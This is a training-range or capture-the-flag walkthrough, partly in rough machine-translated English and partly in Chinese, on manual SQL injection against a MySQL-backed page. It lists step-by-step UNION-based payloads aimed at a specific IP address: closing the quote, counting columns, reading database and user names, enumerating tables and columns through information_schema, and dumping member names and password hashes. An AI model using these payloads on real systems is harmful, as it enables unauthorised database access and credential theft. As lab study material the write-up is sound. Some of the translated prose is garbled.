Practice shooting range - School -sql who inject ink - manual injection vulnerability test (MySQL database - character)

background knowledge

1.Mysql data structure

There is a information_schema mysql database, mysql database information used to maintain other in.

TABLE_SCHEMA field in which the tables table for the library name, TABLE_NAME field for the table;

TABLE_SCHEMA field columns for the database table belongs, TABLE_NAME field for the table name, COLUMN_NAME field for the column name. 

2. The manual injection method.

Whether there is a filter, whether bypassed.

Whether page or varied by time, it determines whether there is the injection point.

Analyzing injection type, character or numeric, character requires closed configuration.

The number of columns is determined by the order by.

After finding the injection point, it is determined that field union available, it is determined that the database name and the user name used, then information_schema view corresponding database (TABLE_SCHEMA) and which of the table (table_name), and then view the corresponding table columns What field.

3.md5 encryption and decryption.

Thinking

1 determines whether there is the injection point. Character, the 'closed configuration.

 

 

Type 'page changes

 

 

 

 http://219.153.49.228:41974/new_list.php?id=tingjigonggao 'and'. 1 '='. 1 , page normal

 

 

 2. Analyzing Sequence

http://219.153.49.228:41974/new_list.php?id=tingjigonggao 'order by 5 - +   page error

 

 

http://219.153.49.228:41974/new_list.php?id=tingjigonggao 'order by 4 - +   Page to return to normal illustrate the four

 

 

 

 

 3. determine the location, the database name, username

http://219.153.49.228:41974/new_list.php?id=' union select 1,2,3,4 --+  或者  http://219.153.49.228:41974/new_list.php?id=' union select '1','2','3','4   

 

 

 http://219.153.49.228:41974/new_list.php?id=' union select '1',database(),user(),'4   ,判断数据库名，用户名

 

 

 4.查询数据库中的表名

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+

 

 

 5.查询数据库的字段名

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='stormgroup_member'--+

 

 

 

 6.查询数据库字段对应的值

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+